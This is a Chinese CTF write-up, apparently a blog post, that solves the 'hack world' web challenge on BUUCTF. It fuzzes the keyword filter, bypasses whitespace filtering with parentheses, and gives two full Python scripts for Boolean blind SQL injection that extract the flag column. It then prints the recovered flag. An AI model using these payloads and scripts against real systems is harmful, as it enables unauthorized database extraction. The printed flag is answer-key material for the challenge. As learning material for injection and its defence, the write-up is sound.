[ciscn2019 North China Day2 web1]hack world --buuctf
2022-06-13 00:28:00 【Golden silk】
Analysis

The challenge gives the table name and the column name as a hint (table flag, column flag). Capture the query request with Burp Suite, run a fuzz over the id parameter, and look at which keywords are filtered.

The responses of length 482 are the filtered ones. Taken one at a time very little is filtered, but as soon as two keywords appear together the request is flagged as SQL injection, so this challenge filters combinations: a single quote together with #, a single quote together with ;, and so on. (select) by itself is not filtered. This rules out many of the usual techniques, and whitespace is filtered as well; spaces can be replaced by parentheses. For the details of the bypass ideas see
[Technology sharing] MySQL injection attack and defense - Anquanke (安全客), security information platform
Method 1
During testing I found that if() can be used:
if(1,1,2)
So do a Boolean-based blind injection. First try to read the database name one character at a time:
if(ascii(substr((select(database())),1,1))>32,1,2)
The response is the one for id 1, so the condition held and the construct works. Now read the column directly:
if(ascii(substr((select(flag)from(flag)),1,1))>32,1,2)
That works too, so use binary search on the ASCII value and write a Python script:

```python
# buuctf web Hack World - Boolean blind injection via if()
import requests

url = "http://3bdb8fd8-acb8-4230-96d0-3845226525ba.node4.buuoj.cn:81/index.php"
flag = ""
i = 0
while True:
    i = i + 1
    left = 32
    right = 127
    # binary search the ASCII code of character i of flag.flag
    while left < right:
        mid = (left + right) // 2
        # id 1 is returned when ascii(char) > mid, id 2 otherwise
        payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,2)"
        data = {"id": payload}
        res = requests.post(url=url, data=data).text
        if "Hello" in res:        # echo of id 1: the condition is true
            left = mid + 1
        else:
            right = mid
    if left != 32:
        flag += chr(left)
        print(flag)
    else:
        # ascii('') is 0 past the end of the string, so every '>mid' is false
        break
```
After running it we get the flag:
flag{dda27733-1184-415d-8dba-5e9597491181}
Method 2
Looking at other people's writeups, there is another approach using the XOR operator.
Test it first: querying id 0 returns nothing for now.
Querying id 1 returns the row.
So we can construct the payload
0^(ascii(substr(database(),1,1))>0)
and the echo is the id 1 response, because 0^1 evaluates to 1 while 0^0 evaluates to 0 (no such row).
So write a script:
```python
# buuctf web Hack World - Boolean blind injection via XOR
import requests

url = "http://3bdb8fd8-acb8-4230-96d0-3845226525ba.node4.buuoj.cn:81/index.php"
flag = ""
i = 0
while True:
    i = i + 1
    left = 32
    right = 127
    # binary search the ASCII code of character i of flag.flag
    while left < right:
        mid = (left + right) // 2
        # 0^(true) = 1 selects id 1; 0^(false) = 0 selects nothing
        payload = f"0^(ascii(substr((select(flag)from(flag)),{i},1))>{mid})"
        data = {"id": payload}
        res = requests.post(url=url, data=data).text
        if "Hello" in res:        # echo of id 1: the condition is true
            left = mid + 1
        else:
            right = mid
    if left != 32:
        flag += chr(left)
        print(flag)
    else:
        # ascii('') is 0 past the end of the string, so every '>mid' is false
        break
```